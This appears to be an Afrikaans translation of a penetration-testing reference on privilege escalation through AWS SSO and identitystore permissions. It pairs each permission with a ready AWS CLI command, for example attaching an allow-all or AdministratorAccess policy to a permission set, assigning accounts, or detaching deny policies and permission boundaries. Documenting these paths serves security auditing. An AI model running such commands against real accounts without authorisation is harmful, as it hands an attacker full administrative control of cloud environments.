AWS - SSO & identitystore Privesc

AWS Identity Center / AWS SSO

Vir meer inligting oor AWS Identity Center / AWS SSO kyk:

Herstel Wachtwoord

'n Maklike manier om voorregte te verhoog in gevalle soos hierdie, sou wees om 'n toestemming te hê wat toelaat om gebruikers se wagwoorde te herstel. Ongelukkig is dit slegs moontlik om 'n e-pos aan die gebruiker te stuur om sy wagwoord te herstel, so jy sal toegang tot die gebruiker se e-pos nodig hê.

identitystore:CreateGroupMembership

Met hierdie toestemming is dit moontlik om 'n gebruiker binne 'n groep te plaas sodat hy al die toestemmings wat die groep het, sal erf.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is.

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

'n Aanvaller met hierdie toestemming kan ekstra toestemmings aan 'n Toestemmingstel toeken wat aan 'n gebruiker onder sy beheer toegeken is.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

'n Aanvaller met hierdie toestemming kan 'n Toestemmingstel aan 'n gebruiker onder sy beheer toeken aan 'n rekening.

aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

Gee die STS korttermyn geloofsbriewe vir 'n gegewe rolnaam wat aan die gebruiker toegeken is.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

U het egter 'n toegangstoken nodig wat ek nie seker weet hoe om te kry nie (TODO).

sso:DetachManagedPolicyFromPermissionSet

'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n AWS bestuurde beleid en die gespesifiseerde toestemmingset verwyder. Dit is moontlik om meer voorregte toe te ken deur 'n bestuurde beleid (weier beleid) te ontkoppel.

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n kliënt bestuurde beleid en die gespesifiseerde toestemmingset verwyder. Dit is moontlik om meer voorregte toe te ken deur 'n bestuurde beleid (weier beleid) te ontkoppel.

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

'n Aanvaller met hierdie toestemming kan die toestemmings uit 'n inline beleid van die toestemmingset verwyder. Dit is moontlik om meer voorregte te verleen deur 'n inline beleid (weier beleid) te ontkoppel.

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

'n Aanvaller met hierdie toestemming kan die Permission Boundary van die toestemmingstel verwyder. Dit is moontlik om meer bevoegdhede te verleen deur die beperkings op die Permission Set wat van die Permission Boundary gegee is, te verwyder.

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>